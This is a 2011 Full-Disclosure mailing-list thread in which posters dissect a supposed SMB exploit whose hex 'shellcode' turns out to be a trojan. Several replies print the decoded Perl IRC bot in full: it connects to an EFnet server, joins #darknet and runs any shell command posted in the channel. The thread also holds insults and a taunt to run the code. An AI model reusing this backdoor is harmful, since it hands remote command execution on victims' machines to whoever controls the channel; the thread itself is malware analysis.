Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
#!/usr/bin/perl$chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron +i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK $nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print $sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print $sock RIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi 2/dev/null;/tmp/hi 2011/10/27 Joshua Thomas rappercra...@gmail.com: Use this link to decode the shellcode ... --- http://www.dolcevie.com/js/converter.html This executes the perl code on the local machine :D On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
On 2011-10-25, at 19:15, adam wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a while. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
'system(h3llcode)' ?? Should be fun... On 10/26/11, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! -- Sent from my mobile device -- Best regards, Flávio do Carmo Júnior Sydney/NSW http://au.linkedin.com/in/carmoflavio/en http://0xcd80.wordpress.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
sounds really useful... [waKKu@1215n ~]$ python -c 'hellcode=( \x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d \x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43 \x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20 \x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64 \x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65 \x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d \x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d \x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20 \x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c \x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22 \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53 \x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20 \x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66 \x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20 \x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20 \x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f \x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63 \x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68 \x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f \x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e \x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e \x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28 \x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24 \x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d \x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24 \x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24 \x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22 \x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22 \x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c \x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d \x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64 \x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69); print hellcode;' #!/usr/bin/perl $chan=#darknet;$nick=moron;$server=efnet.vuurwerk.nl;$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print $sock USER moron +i moron :moronv2\nNICK moron\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode==001;if($mode==433){$i++;$nick=~s/\d*$/$i/;print $sock NICK $nick\n;}}print $sock JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: .$nick.: command\n;while($sock){if (/^PING (.*)$/){print $sock PONG $1\nJOIN $chan\n;}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split \n){print $sock PRIVMSG $chan :$_\n;sleep 1;}}}#chmod +x /tmp/hi 2/dev/null;/tmp/hi [waKKu@1215n ~]$ print hellcode[764:];' /tmp/hi -- On 26 October 2011 13:49, xD 0x41 sec...@gmail.com wrote: yer ofc... anyhow, ignoring you now... you obv think your some leet troll, your not, your ONLY a TROLL :) have a nice day or is that *Goplamamamama Ignananayu* forget the jedi oky, you gotta brushup on ya troll trash talk! bah hahaha. fool xd On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote: Using your smartphone while flipping burger can be dangerous pandawan. More over if you work at burger king. On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote: h the idiot who thinks im laurelai... meh , your a fool yourself just for even thinking that much :s your but an echo on the list, wich, does not echo the rest of it, wich is a good place to be. unfortunately, your one of the few who should just be blocked, for making absolutely nothing but abusive crap... your an idiot. not me. i dont run things, why, have you ran it ?
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Ok... am awake now and, have some infos yes... Interesting bot. Seems i have spoken with some people regarding this and the release.Here is a brief outline of how it goes. Attacks were done on some people who run shells on efnet irc network, so in order to catch the *morons8 or, ppl who did launch the DoS would then be showing up in #darknet channel, and responds to the ops or, channel. I ran this and saw it still clobbers smb,and still uses the original bug, so d0s will still occur, however, it will try and join, i believe thats a dead link in there now but, would have tried to join a efnet node.. Speaking with #darknet owners: ok dude why was this released... msg we released the original working code. this started a massive war of the kids, unfortunately many innocent boxes got raped, so we decided to play a small game, and make a *version plus* or so so say. very interesting concept, new, intuitive to use perl, as many people would decrypt it tho, using perl -e , isnt this alittle harsh... msg they run it, it wont affect them, atall, they will see the connection and kill it,and since no D0s is launched, it wont really work hrmm well, it is a good idea, to capture the arseholes who wish to ddos etc... i see why it is done but also, can i ask you do you know what a darknet is ? because, you seem to not see that, ppl would assume this channel is all about 'darknets'.. instead it is only capturing people who will launch a DoS tool,and many people seem 'idle'. msg we dont control who comes here, now care, but when it comes to d0s, we dont scrw about.hit us,and we will hit back. Also, why are you asking me about code wich was made in 2003 or so :P~ ahh well, thats purely because, i expose any BS like this code is, but, i will not mark this as bullshit. it is horseshit :P and, i respect that your at the least, using some shitty tool like d0s, instead of faking an exploit. I will class this not as exposed atall, instead, it will serve as some form of tuition to skids. Run the tools you cannot read, and, expect even some shitty perlbot to pop out. I like it! I will class this as exposed but intuitive, thankyou for your time. msg i dont care what you mark it as, the rule is simple, do not run d0s ./appz ! Have a nice day! Again thanks for your time, i will keep the nickname anonymous... your not classed as a now-owner , so i guess it is more wtf this was all about, even when you wrote the .c or, as i know it, was 'brain' or some dude... either way, i tip the black hat to you but also warn you not always will them kids be happy to be owned by shitty .c , so, id be expecting more problems from release, than not This is your problem, and, i respect your views, just get some knowledge into you about wtf a 'darknet' is prompto! Also have a nice day. .. Ok so, basically the talk i had with a now non op of channel but, interesting coz, it is actually very popular, yet only a few actually realise that theyre being linked now to a darknet technology app etc, and theyre finding that maybe they should have kept those old ops :P or maybe they could just release 'ipv6killer.c' and just fix some settings..eitherway, it is kinda unique, and strange why there was no chat about this app, until now.. nothing solid wich shows this perl, and admittedly, thats a VERY clever bot for such a small piece of code. Anyhow, thanks to those who found this interesting, sorry to those who didnt :) I think i might hang in darknet channel and wait for a few Hi im a lamer! etc... rofl. cheers, and cheers to #darknet for atleast not faking the tool completely, and, using a skeleton and structure of theyre OWN code. Winnuke2000.c is NOT backdoored, and IS theyres also, I think they regret releasing it now but, this was 2003, and, as i said, i will try and expose anything i find strange, however, from now on, ill be marking exposes under noise, as theyre non disclosures. xd On 26 October 2011 16:55, Flavio do Carmo Junior carmo.fla...@gmail.comwrote: sounds really useful... [waKKu@1215n ~]$ python -c 'hellcode=( \x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
You think no one saw your trolls coming ? Time to grow the fuck up fat ass. On Tue, Oct 25, 2011 at 10:49 PM, xD 0x41 sec...@gmail.com wrote: yer ofc... anyhow, ignoring you now... you obv think your some leet troll, your not, your ONLY a TROLL :) have a nice day or is that *Goplamamamama Ignananayu* forget the jedi oky, you gotta brushup on ya troll trash talk! bah hahaha. fool xd On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote: Using your smartphone while flipping burger can be dangerous pandawan. More over if you work at burger king. On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote: h the idiot who thinks im laurelai... meh , your a fool yourself just for even thinking that much :s your but an echo on the list, wich, does not echo the rest of it, wich is a good place to be. unfortunately, your one of the few who should just be blocked, for making absolutely nothing but abusive crap... your an idiot. not me. i dont run things, why, have you ran it ? Is it good ? hehe... maybe it is! i guess if hes using it...well... *sic* On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote: Do yourself a favor and run that code dumbass. On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote: I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Use this link to decode the shellcode ... --- http://www.dolcevie.com/js/converter.html This executes the perl code on the local machine :D On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Exploits this, maybe? http://www.us-cert.gov/cas/bulletins/SB05-040.html#smb On Tue, Oct 25, 2011 at 6:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Hrm, exactly what im wondering about, is that packet just 'junk' in effect , or just hiding more :s I will investiagte it. It is strange tho, as nothing of the *normal* has detected anything malign yet to me, but, i just started the OS i use for this stuff 20seconds ago, and it has only read a few setors of the code sofar... yes, it is a home lab, it is just IBM x3 3U racks, put together in a DIYs kinda rack,but works for me :) It is also a 'darknet' , so many of this kinda network shit seems to dribble in from many places, atm it seems, this is the .c file theyre trying to hide, apparently it can send a negotiation wich just trashes the SMB client, according to this, wich i am going to see what does exactly in about 5minutes :P i will keepyou informed as yes, usually most ddos wich uses *trash* code to send as broadcasting packet, would encapsulate exactly this, BS, wich, this is not. It is some code in there, but, it is also not str8 forward yet for me, until i have results but, it does spawn some strange sockets :s I will see where it leads. thx for that info about the SMB bugs, i do know of them but, just have seen this done once properly on linux, wich is a really hardass attacking tool, and clobbers smb server, but, this one seemingly does it diferently. there is a winssmb-nuke tool already, i know that DOES work 100% now i did alittle google b4 ending this post, and, this is the apprent descendant, wich was sold. I will look now and wait for my os to read thru it abit... and darknet to see where it connects. interesting one tho. i have also found similar code, for something else called ipv6killer.c ,no not ipv6fuck.c wich is also, actually real, but, ipv6killer.c, wich is almost exactly this same code, but, actually seems setup for ipv6, so makes me think about this one harder :s i am stumped until i have a malware analysis from my box, as i dont run things at first glance, specially ddos crap, that will certainly lead to mem corruption :P ok, cheers sofar, ill keep looking! xd On 26 October 2011 13:03, Flavio do Carmo Junior carmo.fla...@gmail.comwrote: 'system(h3llcode)' ?? Should be fun... On 10/26/11, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! -- Sent from my mobile device -- Best regards, Flávio do Carmo Júnior Sydney/NSW http://au.linkedin.com/in/carmoflavio/en http://0xcd80.wordpress.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Ok... i see now, it is being disguised, from along time ago... strange why it is being used, unless people have started to rename things maybe... to suit old things, wich dont work :s it is possible... I will see what it is doing and done sofar in the darknet i have setup in a sec and, that will be it. ok.. cheers. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
h the idiot who thinks im laurelai... meh , your a fool yourself just for even thinking that much :s your but an echo on the list, wich, does not echo the rest of it, wich is a good place to be. unfortunately, your one of the few who should just be blocked, for making absolutely nothing but abusive crap... your an idiot. not me. i dont run things, why, have you ran it ? Is it good ? hehe... maybe it is! i guess if hes using it...well... *sic* On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote: Do yourself a favor and run that code dumbass. On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote: I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) 